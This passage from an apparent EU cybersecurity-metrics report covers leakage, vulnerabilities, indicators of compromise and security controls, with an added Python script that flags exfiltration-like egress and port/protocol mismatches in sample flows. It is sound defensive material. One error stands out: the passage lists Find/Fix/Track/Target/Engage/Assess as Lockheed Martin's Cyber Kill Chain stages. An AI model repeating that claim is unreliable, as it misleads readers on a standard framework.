Just before President Trump’s inauguration, hackers tampered with 70% of storage devices that record data from police surveillance cameras in Washington, D.C., “forcing major citywide reinstallation efforts.”121

Usage: STUXNET was the world’s first digital weapon. Stuxnet targeted SCADA systems and was responsible for causing substantial physical manipulation and damage to Iran's nuclear program122. Manipulation and damage could be done to any physical entity connected to the Internet. See examples.

Metrics: Analysis of EU industrial clients for physical damage of IT networks and infrastructures: 30% interviewed see malicious parties disrupting physical operations; therefore for EU industrial clients “physical damage of IT networks and infrastructures” was seen as the 2nd highest cyber risk, with data breaches as 1st123.

119 Designing Insider Threat Programs - 2014 - https://insights.sei.cmu.edu/sei_blog/2014/09/designing-insider-threat-programs.html
122 STUXNET, THE WORLD'S FIRST DIGITAL WEAPON - 2014 - https://www.wired.com/2014/11/countdown-to-zero-day-stuxnet/
123 Bridging the cyber-risk gap - 2017 - https://www2.chubb.com/uk-en/_assets/documents/uk7279-jd-10_17-bridging-the-cyber-risk-gap_lowres.pdf

121 Insurance Coverage Issues Created by The Internet - 02 2018 - https://www.lexisnexis.com/lexis-practice-advisor/the-journal/b/lpa/archive/2018/02/28/insurance-coverage-issues-created-by-the-internet.aspx

10.5 Information leakage

Nomenclature Examples Usage Metrics

Nomenclature: Information Leakage is an application weakness where an application reveals sensitive data, such as technical details of the web application, environment, or user-specific data. Sensitive data may be used by an attacker to exploit the target web application, its hosting network, or its users. Information leakage should not be confused with Data Breaches (see 4.10).

Examples: The Home Depot lost a laptop containing personal information on 10,000 employees, one of a string of high-profile data-leak incidents124:
● The Veterans Administration
● TJX
● Monster.com
● Fidelity National Information Services
● Pfizer
● AOL
● Ameritrade

Usage: One of the most publicized data-leak victims: TJX. For the attack TJX accepted responsibility. E.g. TJX should not have stored un-encrypted magnetic stripe information in their databases; this is a flawed storage policy. TJX did not realize they were putting personal information at risk.

Metrics: There are 6 key metrics to measure the maturity and effectiveness of a Data Loss Prevention (DLP) program (this can also be used to determine the risk or if a data breach is underway):
● Number of policy exceptions granted for any defined time period
● Number of False positives generated for any defined time period
● Mean time to respond to any DLP alerts
● Number of un-managed devices in your network handling sensitive data
● Number of databases not yet fingerprinted
● Number of databases and data residents not yet classified

10.6 Vulnerabilities

Nomenclature Examples Usage Metrics

Nomenclature: Vulnerability is a cyber-security term that refers to a flaw in a system that can leave it open to attack. A vulnerability may also refer to any type of weakness in a computer system itself, in a set of procedures, or in anything that leaves information security exposed to a threat.

Examples: The Top 10 examples of security vulnerabilities within the OWASP Top 10 (see 4.3.1 above) are:
● SQL Injection
● Cross Site Scripting
● Broken Authentication and Session Management
● Insecure Direct Object References
● Cross Site Request Forgery
● Security Misconfiguration
● Insecure Cryptographic Storage
● Failure to restrict URL Access
● Insufficient Transport Layer Protection
● Unvalidated Redirects and Forwards

Usage: Inevitably, all operating systems contain vulnerabilities and exposures which can be targeted by hackers and virus writers, although Windows vulnerabilities receive the most publicity due to the number of machines running Windows. There are many exploited vulnerabilities also within the Unix world, which target software packages such as SSH, Apache, WU-FTPD, BIND, IMAP/POP3, various parts of the kernels etc.

Metrics: A vulnerability in IIS, detailed in Microsoft Security Bulletin MS01-033, is one of the most exploited Windows vulnerabilities ever. A large number of network worms have been written over the years to exploit this vulnerability, including ‘CodeRed’. CodeRed was first detected on July 17th 2001 and is believed to have infected over 300,000 targets. It disrupted a large number of businesses and caused huge financial losses around the world. Although Microsoft issued a patch for the vulnerability along with the MS01-033 security bulletin, some versions of the CodeRed worm are still spreading throughout the Internet125.

124 Five data leak nightmares - 2008 - https://www.networkworld.com/article/2289232/lan-wan/five-data-leak-nightmares.html

10.7 False positives

Nomenclature Examples Usage Metrics

Nomenclature: False positives are files or behaviour flagged as malicious when they are not.

Examples: Technology that doesn’t properly recognize real threats. Alert overload can lead to Alert Fatigue.

Usage: A deliberate false positive is, for example, the EICAR test file, developed by the European Institute for Computer Antivirus Research to verify the response of antivirus programs without having to use real malware.

Metrics: At large enterprises worldwide it was found that 37 percent of respondents receive more than 10,000 alerts each month. Of those alerts, 52 percent were false positives126. It costs $1.3 million a year to investigate false positives, or 21,000 hours of wasted time.

125 Vulnerabilities examples - https://securelist.com/threats/vulnerabilities-examples/
126 https://www.fireeye.com/blog/products-and-services/2017/06/eliminate-alert-fatigue.html

11 IOCs Indicators of Compromise

Indicators of compromise (IOCs) are “pieces of forensic data, such as data found in system log entries or files, that identify potentially malicious activity on a system or network”. Indicators of compromise aid information security and IT professionals in detecting data breaches, malware infections, or other threat activity.

Nomenclature: Pieces of forensic data that cumulatively indicate a computer intrusion.

Examples: See Sections 13.1 to 13.16 below

Usage:
• Detect intrusion attempts or other malicious activities.
• Better analyze a particular malware’s techniques and behaviours
• Provide actionable threat intelligence that can be shared within the community

Metrics: See Sections 13.1 to 13.16 below

The following 16 tables are the current specific and generally accepted indicators of compromise. By monitoring for indicators of compromise, organizations can detect attacks and act quickly to prevent breaches from occurring or limit damages by stopping attacks during earlier stages.

11.1 Insider threat

Nomenclature: An insider threat can come from a current or former employee, a board member, or anyone who has ever had access to an organisation’s proprietary or confidential information including: Contractors, Business associates, Third parties, Individuals who have knowledge of an organisation’s security practices, confidential information or access to protected networks or databases.

Examples:
• Unauthorized download or copying of sensitive data,
• Taking and keeping critical sensitive information in home
• Operating unauthorized equipment (such as cameras, recording devices, mass storages, internet access points, etc.)
• Asking other employees for their credentials
• Accessing data that has little to no relation to present role at the company

Usage: Loss or theft of data

Metrics: The average cost of an insider threat annually is $8.76 million (2017)127.

127 https://www.observeit.com/ponemon-report-cost-of-insider-threats/

11.2 Unusual outbound network traffic (egress)

Nomenclature: Unusual traffic patterns leaving the network

Examples: Outbound connection counts, user, bandwidth, count of unique destinations, large file transactions

Usage: Data exfiltration, data extrusion, data exportation or data theft for malicious purposes; to provide evidences of data theft or bandwidth abuse

Metrics: 225 out of 315 IT teams surveyed used egress filtering in 2017/18128

11.3 Anomalies in privileged user account activity

Nomenclature: Escalation of privileges of accounts or means of access to other accounts with higher privileges

Examples: Anomalies in privileged user account activities; log in failures; authentication failures; unusual login times; type of information accessed

Usage: To gain unauthorised access to sensitive data, create new accounts, delete information, cause malicious damage. Prevention through user behaviour analytics.

Metrics: 55% of cybersecurity professionals surveyed thought Privileged IT users/admins posed the biggest security risk to organisations129. Privilege misuse is 5th out of the top 9 most likely threats130

128 https://www.sans.org/cyber-security-intelligence/2018/11/13/its-awfully-noisy-out-there-results-of-the-2018-sans-incident-response-survey
129 https://www.ca.com/content/dam/ca/us/files/ebook/insider-threat-report.pdf
130 https://enterprise.verizon.com/resources/reports/DBIR_2018_Report_execsummary.pdf

11.4 Geographical irregularities

Nomenclature: Unusual patterns in geographic connections

Examples: An account logging in from different IPs around the world. Connections to countries with no business relationships.

Usage: For malicious purpose including data theft, including gaining access to sensitive data. Used as an indicator in threat hunting. Use blacklists or blackholes to isolate suspicious activity.

Metrics: Cyber espionage is 6th out of 9 on the list of top threats from Verizon131

11.5 Log-in red flags

Nomenclature: Unusual log in patterns and activities

Examples: Failed logins using user accounts that don't exist, attempted and successful log-in activity after hours, brute force attacks

Usage: To gain unauthorised network access. Monitor with a baseline for normal activity.

Metrics: 45% of security analysts used unusual log in patterns and activities as an IOC in 2017132

11.6 Increases in database read volume

Nomenclature: Spikes in database read volumes

Examples: Evidence of existing system intrusion detected using database auditing and forensics.

Usage: Threat hunting indicator

Metrics: Within the Sony data breach post analysis there was a 24-40% increase in database read volumes, which had gone unnoticed133.

11.7 HTML response sizes

Nomenclature: Unusually large response HTML requests sent from a web application

Examples: A HTML response size that is normally around 260 KB rises to 50MB, for example. 500 Internal Server Errors and 501 Header Value errors in the Web Server Logs.

Usage: SQL injection to extract data through a Web Application. Threat hunting IOC via web logs. Log analyzers & SIEM provide automated tools and analysis of HTML responses.

Metrics: HTML Response Size was used by 44% of threat hunters as an IoC134.

131 https://enterprise.verizon.com/resources/reports/DBIR_2018_Report_execsummary.pdf
132 https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-sept-2017.pdf
133 https://www.academia.edu/23717709/Sony_Information_Security_Case_study

11.8 Large numbers of requests for the same file

Nomenclature: Unusual patterns or spikes in requests for the same file

Examples: A high volume of requests for a single file, for example a single user or IP making 500 requests for 'join.php'

Usage: Malicious purposes, data theft, cyber espionage, etc. Used as forensic evidence in threat hunting.

Metrics: 46% of security analysts used spikes in requests for the same file as an IOC in 2017135

11.9 Mismatched port-application traffic

Nomenclature: An application using an unusual port. Can be inbound or outbound. Examples of standard ports are 80-TCP (HTTP), 443-TCP (SSL/TLS), 53-UDP (DNS).

Examples: A DNS request masks an infected host communicating via, for example, port 80.

Usage: Attackers use common (HTTP, HTTPS, SSL/TLS or DNS) or custom protocols for illicit Command and Control (C2) channels. Attackers can use combinations of protocols and ports, e.g.:
Common Protocol + Common Port
Common Protocol + Uncommon Port
Custom Protocol + Common Port
Custom Protocol + Uncommon Port.
Proxy logs, IIS logs, DNS resolution logs and HTTP, SSL, DNS, SMTP logs, etc, are used to detect anomalies.

Metrics: Mismatched Port Application Traffic is one of the top 15 IOCs

134 https://resources.infosecinstitute.com/category/enterprise/threat-hunting/iocs-and-artifacts/threat-hunting-and-html-response-size/
135 https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-sept-2017.pdf
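The following Python script is an added example (not code from the SAINT report) covering both section 11.2 and section 11.9: it classifies constructed outbound flow records into the protocol/port combinations listed above, using the standard port pairs quoted in the table, and computes the per-user egress measures from section 11.2 (connection counts, unique destinations, bytes out, large transfers). The flow records, user names, IP addresses and thresholds are all constructed; the 'app' field stands for the application protocol a proxy or IDS would label from payload inspection.

```python
"""Egress metrics (section 11.2) and port/application mismatches (section 11.9)
over constructed flow records (added example, not from the SAINT report).

Each record is one outbound connection: 'app' is the application protocol as
labelled by payload inspection (what a proxy or IDS would report), while
'transport' and 'port' are what was seen on the wire.
"""
from collections import defaultdict

# Standard port/application pairs quoted in section 11.9.
STANDARD_PORTS = {("tcp", 80): "http", ("tcp", 443): "tls", ("udp", 53): "dns"}
COMMON_APPS = set(STANDARD_PORTS.values())

NORMAL = "common protocol + common port"

# Constructed flow records, not real traffic.
FLOWS = [
    {"user": "alice", "dst": "198.51.100.10", "transport": "tcp", "port": 443, "app": "tls", "bytes_out": 12_000},
    {"user": "alice", "dst": "198.51.100.11", "transport": "tcp", "port": 80, "app": "http", "bytes_out": 4_000},
    {"user": "alice", "dst": "192.0.2.53", "transport": "udp", "port": 53, "app": "dns", "bytes_out": 300},
    # DNS carried over TCP/80: the table's example of a masked infected host
    {"user": "bob", "dst": "203.0.113.5", "transport": "tcp", "port": 80, "app": "dns", "bytes_out": 900},
    {"user": "bob", "dst": "203.0.113.6", "transport": "tcp", "port": 8443, "app": "tls", "bytes_out": 2_000},
    {"user": "bob", "dst": "203.0.113.7", "transport": "tcp", "port": 443, "app": "unknown", "bytes_out": 1_500},
    {"user": "bob", "dst": "203.0.113.8", "transport": "tcp", "port": 4444, "app": "unknown", "bytes_out": 700},
    {"user": "bob", "dst": "203.0.113.9", "transport": "tcp", "port": 443, "app": "tls", "bytes_out": 250_000_000},
]


def classify(flow):
    """Name the protocol/port combination class from section 11.9 for one flow."""
    expected = STANDARD_PORTS.get((flow["transport"], flow["port"]))
    common_app = flow["app"] in COMMON_APPS
    if expected is not None:                      # a common port
        if flow["app"] == expected:
            return NORMAL
        if common_app:
            return "common protocol + wrong common port"
        return "custom protocol + common port"
    if common_app:                                # an uncommon port
        return "common protocol + uncommon port"
    return "custom protocol + uncommon port"


def mismatched_flows(flows):
    """Flows whose application does not match the port convention."""
    return [
        {"user": f["user"], "dst": f["dst"], "port": f["port"], "app": f["app"], "class": classify(f)}
        for f in flows
        if classify(f) != NORMAL
    ]


def egress_summary(flows, large_bytes=100_000_000):
    """Per-user outbound connection count, unique destinations, bytes out and
    number of large transfers: the egress measures listed in section 11.2."""
    acc = defaultdict(lambda: {"connections": 0, "destinations": set(), "bytes_out": 0, "large_transfers": 0})
    for f in flows:
        s = acc[f["user"]]
        s["connections"] += 1
        s["destinations"].add(f["dst"])
        s["bytes_out"] += f["bytes_out"]
        if f["bytes_out"] >= large_bytes:
            s["large_transfers"] += 1
    return {u: {**s, "destinations": len(s["destinations"])} for u, s in acc.items()}


def egress_outliers(summary, max_destinations=4, max_bytes=100_000_000):
    """Users exceeding simple egress thresholds (thresholds are constructed;
    in practice derive them from each user's own history)."""
    return sorted(
        u for u, s in summary.items()
        if s["destinations"] > max_destinations or s["bytes_out"] > max_bytes
    )


if __name__ == "__main__":
    for m in mismatched_flows(FLOWS):
        print(f"MISMATCH {m['user']} -> {m['dst']}:{m['port']} app={m['app']} ({m['class']})")
    summary = egress_summary(FLOWS)
    for user in egress_outliers(summary):
        print(f"EGRESS {user}: {summary[user]}")
```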

11.10 Suspicious registry or system file changes

Nomenclature: Attackers target system files and configurations

Examples: Registry or system file changes enable attackers to establish persistence and leverage of the system. Installing packet-sniffing software is common for credit card data harvesting.

Usage: Harvesting of payment card data, sensitive data, etc. Endpoint detection and remote scanning for detection of malicious programs.

Metrics: 49% of security analysts used Registry or system file changes as IOCs in 2017136

11.11 Unusual DNS requests

Nomenclature: Unusual patterns left by malicious DNS queries

Examples: Patterns left by DNS queries are signs of unusual activity. Command-and-control traffic is important to an attacker to establish a route for malicious activity.

Usage: Connection to external hosts for phishing and other compromises such as content filtering. An important indicator of malicious activity. Threat intelligence tools and filtering solutions, DNS services help protect against phishing and content filtering.

Metrics: 53% of security analysts used unusual patterns left by malicious DNS queries as an IOC in 2017137

136 https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-sept-2017.pdf
137 https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-sept-2017.pdf

11.12 Unexpected patching of systems

Nomenclature: Patching is a requirement of good security, whereas unexpected patching is a sign of unusual activity

Examples: To lock down the system after an infection. The Trojan Win32/Patched a.k.a. WinNT/Patched is an example from 2008.

Usage: Malicious behaviour

Metrics: 33% of security analysts used unexpected patching of systems as an IOC in 2017138

11.13 Mobile device profile changes

Nomenclature: Changes to mobile configuration profiles not set by employer

Examples: Compromises of mobile devices through phishing or spear-phishing attacks. Replacement of apps for man-in-the-middle attacks.

Usage: Exploits via phishing or spear phishing to gain access to a network via mobile devices.

Metrics: 59.2% of corporate owned laptops, smartphones, tablets & other devices were breached according to Incident response teams139

11.14 Bundles of data in the wrong place

Nomenclature: Large quantities of information and data where they should not be

Examples: Data compressed in archive formats. Files in unusual locations such as the root folder of the recycle bin, executable files in the temp folder.

Usage: Malicious attacks and compromises. Used in threat hunting as a red flag.

Metrics: NA

11.15 Web traffic with unhuman behaviour

Nomenclature: Unusual web traffic behaviour

Examples: Opening more than an average number of browser windows. Using web browsers other than the designated one.

Usage: Click-fraud malware families. Noisy volumes indicate unusual activity to threat hunters.

Metrics: 8,448,885,728 Bad Bots detected during a 30 day snapshot – see 9.6 Bad Bots above

138 https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-sept-2017.pdf
139 https://www.sans.org/cyber-security-intelligence/2018/11/13/its-awfully-noisy-out-there-results-of-the-2018-sans-incident-response-survey

11.16 Signs of DDoS activity

Nomenclature: A DDoS attack is an attempt to make a network, machine or resource unavailable

Examples: Flooding the target machine with excessive requests to overwhelm security reporting systems, such as IPS/IDS or SIEM solutions, and disable communication systems

Usage: A form of concealment while cybercriminals plant malware or steal sensitive data. Signs are unavailability of websites, slow network performance, failover of firewalls and back-end systems such as file servers unexplainably operating at max system capacity.

Metrics: 52% of security analysts used signs of DDoS or geographic irregularities as an IOC in 2017140

140 https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-sept-2017.pdf

12 Indicators - Security

There are many elements of security within ICT (Information and Communications Technology). The 12 indicators described here are the most relevant within current cyber security and are key indicators of threat prevention.

12.1 Antivirus

Nomenclature: Anti-virus software is a software utility that detects, prevents, and removes viruses, worms, and other malware from a computer.

Examples: A non-exhaustive comparative list of antivirus and Internet Security software, in the form of comparison tables, according to their platform (e.g. desktop and server, mobile, etc.) and their operating systems (e.g. Windows, OS X, Linux, Solaris, Android, iOS, Ubuntu Touch, Windows Phone, etc.) is shown here141

Usage: Most anti-virus programs include an auto-update feature that permits the program to download profiles of new viruses, enabling the system to check for new threats. Antivirus programs are essential utilities for any computer but the choice of which one is very important. One AV program might find a certain virus or worm while another cannot, or vice-versa.

Metrics: A Malware Protection Test assesses an Antivirus program’s ability to protect a system against infection by malicious files: at March 2018 the best-known Antivirus software providers show between 100% and 99.7% protection142.

12.2 Security Information and Event Management (SIEM)

Nomenclature: Security information and event management (SIEM) is an approach to security management that combines SIM (security information management) and SEM (security event management) functions into one security management system.

Examples: SIEM is important, due to its scalability and several open source tools. Therefore, useful for SMEs and small organizations within the EU. Examples:

OSSIM is the open source version of Alien Vault’s Unified Security Management. OSSIM combines its native log storage and correlation capabilities with numerous open source projects to build a complete SIEM143.

ELK (short for Elasticsearch, Logstash, and Kibana) is the most popular open source SIEM tool available, but not a standalone solution144.

Prelude is a SIEM framework that unifies various other open source tools. It is the open source version of the commercial tool by the same name145.

Splunk Quick Start for SIEM provides an analytics-driven security information and event management solution. It has a free (limited size) open source version146

Usage: SIEM is implemented via software, systems, appliances. There are, generally speaking, six main attributes of an SIEM system:

Retention: Storing data for long periods so that decisions can be made from more complete data sets.

Dashboards: Used to analyse (and visualize) data in an attempt to recognize patterns or target activity or data that does not fit into a normal pattern.

Correlation: Sorts data into packets that are meaningful, similar and share common traits. This can activate certain protocols to alert users, like notifications sent to the dashboard, an automated email or text message.

Data Aggregation: Data can be gathered from any number of sites: servers, networks, databases, software and email systems.

Compliance: Data analysis for compliance with company, organizational or government policies.

Metrics: SIEM operational metrics:
● Number of alerts handled (per analyst, per rule, per target, etc)
● Alert response timing [such as time from triggering to review, then to first action, then to closure or escalation]
● Number of incidents opened based on SIEM alerts (by time unit, by analyst, by target, etc)

141 Comparison of antivirus software - https://en.wikipedia.org/wiki/Comparison_of_antivirus_software
142 Malware Protection Test - 03 2018 - https://chart.av-comparatives.org/chart1.php

143 OSSIM - https://www.alienvault.com/products/ossim
144 ELK - https://www.elastic.co/
145 Prelude - https://www.prelude-siem.org/
146 Splunk - https://www.splunk.com/en_us/products/quick-start-bundles/siem.html

12.3 Managed Security Services (MSS)

Nomenclature: An approach to managing an organization's security needs. The services are normally outsourced to a service provider that oversees other companies' network and information system security. Functions of a managed security service include 24/7 monitoring and management of intrusion detection systems and firewalls, overseeing patch management/upgrades, performing security assessments/audits, and responding to emergencies.

Examples: Globally the biggest provider of MSS to large companies is IBM, which monitors 35 billion security events daily in more than 130 countries. Although the security offerings from managed security services companies vary, the following features are common to most of them:
Distributed denial of service (DDoS) protection
Advanced threat intelligence services
Secure messaging gateways, secure web gateways and web application firewalls delivered "as a service"
Managed vulnerability management
Identity and access management

Usage: Most organizations (58%) are still sourcing their security operations programs in-house. Increasingly popular sourcing alternatives include a hybrid of in-house and outsourced services (16%), outsourcing to a managed security service provider (12%), and outsourcing to a managed threat detection and response provider (5%).147

Metrics: In a recent survey (2018 – Alien Vault) the key drivers for enterprises’ use of MSS are:
47% Lack of internal security personnel/expertise
44% 24x7 security coverage
42% Cost savings by outsourcing


12.4 Security Operations Centre (SOC)

Nomenclature: A facility that houses an information security team responsible for monitoring and analysing an organization’s security posture on an ongoing basis, and managed within the organization. The goal is to detect, analyse, and respond to cybersecurity incidents. Security operations centres are typically staffed with security analysts and engineers as well as managers who oversee security operations.

Examples: A SOC should enable defence of the perimeter using security information and event management (SIEM) tools, i.e.:
Network information, such as hashes, URLs, connection details, etc.
Vulnerability information reported by vulnerability scanners
Security intelligence feeds
Topology information
Web proxy URL
External-facing firewall
Antivirus
Virtual private networks (VPNs)
Radius/Lightweight Directory Access Protocol (LDAP)
Endpoint monitoring
Domain name system (DNS)
Dynamic Host Configuration Protocol (DHCP)
Intrusion prevention (IPS) and detection (IDS) systems
Operating systems (OSs)
Other syslogs

Usage: Using a SOC is primarily to detect, analyse, and respond to cybersecurity incidents using a combination of technology solutions and a strong set of processes. Security operations centres are typically staffed with security analysts and engineers as well as managers who oversee security operations.

Metrics: As noted in EY’s survey on SOC users: Mounting threat levels require a more robust response and many organizations continue to increase their spending on cybersecurity. 70% say they require up to 25% more funding, 30% reported they require even more than this. However, only 12% expect to receive an increase of more than 25%148.

147 https://www.alienvault.com/blogs/security-essentials/managed-security-trends-and-usage
148 https://www.ey.com/Publication/vwLUAssets/GISS_report_2017/%24FILE/REPORT%20-%20EY%20GISS%20Survey%202017-18.pdf

12.5 The Cyber Kill Chain

Nomenclature: The Cyber Kill Chain is a phase-based model to describe the stages of an attack, which also helps inform ways to prevent such attacks. These stages, which are borrowed from the military and developed by Lockheed Martin149, are referred to as:
● Find
● Fix
● Track
● Target
● Engage
● Assess

Examples: Training for the cyber kill chain utilises a cyber range. This is a virtual environment that is used for cyber warfare training and cyber technology development.

Usage: It provides tools that help strengthen the stability, security and performance of cyberinfrastructures and IT systems used by government and military agencies. The framework is part of the Intelligence Driven Defence model for identification and prevention of cyber intrusions activity. The model identifies what the adversaries must complete in order to achieve their objective.

Metrics: Metrics for breaking kill chains: These metrics identify the most vulnerable points in attack chains. Scan for these key metrics and you will address the most serious attack path vulnerabilities:

The number of Internet facing computers servers that are exploitable. Identify servers on the network perimeter, in the DMZ, or deployed deep in your network and Internet addressable. Audit for services that are exposed to the Internet via open ports where an attack path could jump into an internal network.

The number of Internet browsing computers with exploitable clients. Identify all assets that connect externally to the Internet and the ports that are used. Identify specific client-side applications such as Skype, Facebook, YouTube, etc. Alert on devices that browse the Internet with unsupported or outdated software150.

149 The Cyber Kill Chain - https://www.lockheedmartin.com/us/what-we-do/aerospace-defense/cyber/cyber-kill-chain.html

12.6 Authentication

Nomenclature: Authentication is the process of verification that an individual, entity or website is who it claims to be. Authentication in the context of web applications is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know. Session Management is a process of authentication by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction.

Examples: Programming / web application example:
● Requesting Authentication Using an Internal Certificate
● Requesting authentication using an external certificate
● Validating authentication
● Enforcing authentication

Usage: In order to prevent the key method to bypass authentication, i.e. Brute-Force Attacks, web application and software developers should:
● Implement Proper Password Strength Controls
● Password Length
● Password Complexity
● Password Topologies
● Implement Secure Password Recovery Mechanism
● Store Passwords in a Secure Fashion
● Transmit Passwords Only Over TLS or Other Strong Transport
● Require Re-authentication for Sensitive Features

Metrics: There is a lack of standard performance metrics regarding the use of knowledge-based authentication (KBA) for remote identity proofing. KBA-PMP's goal is to establish standard performance metrics for knowledge-based authentication, following a transnational perspective151.
KBA-PMP Best Practices:
● Identity solutions will be secure and resilient.
● Identity solutions will be interoperable.
● Identity solutions will be cost-effective and easy to use.

150 Metrics for breaking kill chains - https://www.tenable.com/blog/identifying-the-weakest-links-in-cyber-kill-chains
151 OWASP Knowledge Based Authentication Performance Metrics Project - https://www.owasp.org/index.php/OWASP_Knowledge_Based_Authentication_Performance_Metrics_Project

12.6.1 Multi-factor authentication

Multi-factor authentication (MFA) is a method of confirming a user's claimed identity in which a user is granted access only after successfully presenting 2 or more pieces of evidence (or factors) to an authentication mechanism: knowledge (something they and only they know), possession (something they and only they have), and inherence (something they and only they are).

Two-factor authentication (also known as 2FA) is a type (subset) of multi-factor authentication. It is a method of confirming a user's claimed identity by utilizing a combination of two different factors:
● something they know
● something they have
● something they are.

A good example of two-factor authentication is the withdrawing of money from an ATM; only the correct combination of a bank card (something that the user possesses) and a PIN (personal identification number, something that the user knows) allows the transaction to be carried out.

Biometric authentication / recognition (also known as biometrics) refers to the automated recognition of individuals based on their biological and behavioural traits (ISO/IEC JTC1 SC37152 with 121 existing standards, and 32 under development). Examples of biometric traits include fingerprint, face, iris, palmprint, retina, hand geometry, voice, signature and gait.

12.6.2 Authorization

Authorization is a process by which a server determines if the client has permission to use a resource or access a file. Authorization is usually coupled with authentication so that the server has some concept of who the client is that is requesting access. The type of authentication required for authorization may vary; passwords may be required in some cases but not in others. In some cases, there is no authorization; any user may be able to use a resource or access a file simply by asking for it. Most of the web pages on the Internet require no authentication or authorization.

12.7 Digital epidemiology (evidence-based practice)

Nomenclature: The study of patterns of disease using digital data. As an advancing field within cybersecurity it is defined as the adaptation of techniques used in mathematical epidemiology in disease (health) control to the study of computational viruses and threat analysis.

Examples: This relatively new field of study is progressing through the availability of large datasets generated within threat analysis and recent advances in artificial intelligence.

Usage: To apply the digital study of patterns and disease control to evidence-based practices within the field of cybersecurity (best research evidences, expert knowledge and stakeholder experiences) - see Figure 12.1 below, SAINT model of the value of digital epidemiology with evidence-based practices.

Metrics: See Figure XX below, an innovative model illustrating how to generate metrics from evidence-based practices for digital epidemiology.

152 ISO/IEC JTC 1/SC 37 - https://www.iso.org/committee/313770.html

The overall theme of WP2 The Metrics of Cybersecurity is that it is “… all about the evidence and the data…”. Digital epidemiology and Evidence-Based Practices (EBP) enable the building of a framework in support of making cyber security metrics an empirical science. We illustrate this in the model shown in Figure 12.1. This represents an innovative paradigm where metrics are gathered from a number of EBP sources which we call Scientific Knowledge, Consumer Knowledge, and Practitioners’ Expertise. We call this the SAINT triad of EBP for digital epidemiology. Advances in artificial intelligence will aid in the gathering of evidences from sources that previously were not readily available. The combination of rich evidences will help promote innovative solutions to attack and threat prevention such as the SAINT model proposes.

Figure 12.1: The SAINT Triad of Evidence-Based Practices for Digital Epidemiology


12.8 Data-centric security

Nomenclature: The data-centric approach to cybersecurity is based on the need to protect an organization’s sensitive data, rather than the IT infrastructure. By protecting sensitive information in the files and databases that contain it, the data-centric approach implies taking advantage of cloud computing, mobile technology, and other innovations without placing an organization at risk.

Examples: Data breaches are evolving and becoming increasingly more complex. A breach can involve one or more paths to your data, including:
● Excessive, inappropriate, and unused user privileges
● Privileged user abuse
● Insufficient web application security
● Database misconfigurations and/or missing patches
● Query injections — SQL injections that target traditional databases and NoSQL injections that target Big Data platforms
● Malware-infected devices and unsecured storage media
● Social engineering — baiting, phishing, pharming, pretexting, ransomware, tailgating, and others.

Usage: A comprehensive data-centric security strategy includes the following 10 key elements153:
● Data discovery
● Data classification
● Data tagging & watermarking
● Data loss prevention
● Data visibility
● Encryption strategies
● Enhanced gateway controls
● Identity management
● Cloud access
● Continuous education

Metrics: Increasingly, businesses are exploring data-centric security approaches to allow them to lock down user authentication and access rights. For example: Alphabet Inc.’s (Google) autonomous vehicle unit, Waymo LLC, filed a lawsuit against Uber Technologies Inc., alleging the theft of trade secrets related to the lidar scanner, a radar-like device. A former engineer, Anthony Levandowski, is accused in the suit of having downloaded thousands of documents before leaving Waymo to start his own self-driving tech company, Otto, which was sold to Uber only months later for $680 million.

12.9 Data encryption

Nomenclature: Data encryption is the practice of electronically converting information into a different format, i.e. ciphertext, a language that transforms plaintext files, folders, application and software language into undecipherable text. Each user uses encryption keys for the specific ciphertext germane to their enterprise. Only users with authorization and encryption keys can open anything encrypted for the safety of the venture.

Examples: The usage of HyperText Transfer Protocol Secure (HTTPS), instead of HyperText Transfer Protocol (HTTP). Using HTTPS, the user's computer and the website server agree on a "code" between them, and then they scramble the messages, e.g. logins, online payments, etc. using that "code" so that no one in between can read or intercept them.

HTTPS for a website needs to be tested independently, for example an SSL Report: cyberdefcon.com (54.154.124.30) shows an A+ rating154

The EFF (Electronic Frontier Foundation) launched “HTTPS Everywhere”. HTTPS Everywhere is a browser extension that encrypts all communications with many major websites, making browsing more secure155.

Usage: Genuine data encryption requires that three things be in place at all times: authentication, non-repudiation and integrity156.
● Authentication means that where data came from is quickly and easily verifiable to ensure the safety and authenticity.
● Non-repudiation is a way to set up communications so that the original sender of a file, folder, email or other type of data is unable to say they didn't send anything that originated from their machine or smart device. Every person's electronic signature is different in non-repudiation assurance.
● Integrity: when referring to computing and encryption, integrity is evidence that a message and any of the contents of a message haven't been altered in any way since the message was originally sent.

Metrics: Percentage of Web Pages Loaded by Firefox worldwide using HTTPS in Jan 2014 was ~30%; by Jan 2018 it had risen to ~70%. This is in the main due to the use of “HTTPS Everywhere” and “Let’s Encrypt”, a community initiative providing a free, automated, and open certificate authority (CA), and the digital certificates they need in order to enable HTTPS (SSL/TLS) for websites157. For example the SAINT website uses a Let's Encrypt Authority X3, with a strong RSA 2048 bits (SHA256withRSA) cipher: https://project-saint.eu/

153 10 Keys to Data-Centric Security - 2016 - http://focus.forsythe.com/articles/512/10-Keys-to-Data-Centric-Security

12.10 Firewall

154 SSL Report: cyberdefcon.com (54.154.124.30) - https://www.ssllabs.com/ssltest/analyze.html?d=cyberdefcon.com
155 HTTPS Everywhere - https://www.eff.org/https-everywhere
156 Data Encryption - 2017 - https://www.tintri.com/glossary/data-encryption
157 Let's Encrypt - https://letsencrypt.org/

Nomenclature: A firewall is a network security device that monitors incoming and outgoing network traffic and decides whether to allow or block specific traffic based on a defined set of security rules.

Examples: Next-generation firewall (NGFW). Firewalls have evolved beyond simple packet filtering and stateful inspection. Most companies are deploying next-generation firewalls to block modern threats such as advanced malware and application-layer attacks. A next-generation firewall must include:
● Standard firewall capabilities like stateful inspection
● Integrated intrusion prevention
● Application awareness and control to see and block risky apps
● Upgrade paths to include future information feeds
● Techniques to address evolving security threats

Usage: Firewalls have been a first line of defence in network security for over 25 years. They establish a barrier between secured and controlled internal networks that can be trusted and untrusted outside networks, such as the Internet. A firewall can be hardware, software, or both.

Metrics: It is difficult to assess the security of modern enterprise networks because they are usually dynamic, with configuration changes (such as changes in topology, firewall rules, etc.). Graphical security models (e.g., Attack Graphs and Attack Trees) and security metrics (e.g., attack cost, shortest attack path) are widely used to systematically analyse the security posture of network systems158.

12.11 GDPR (General Data Protection Regulation)

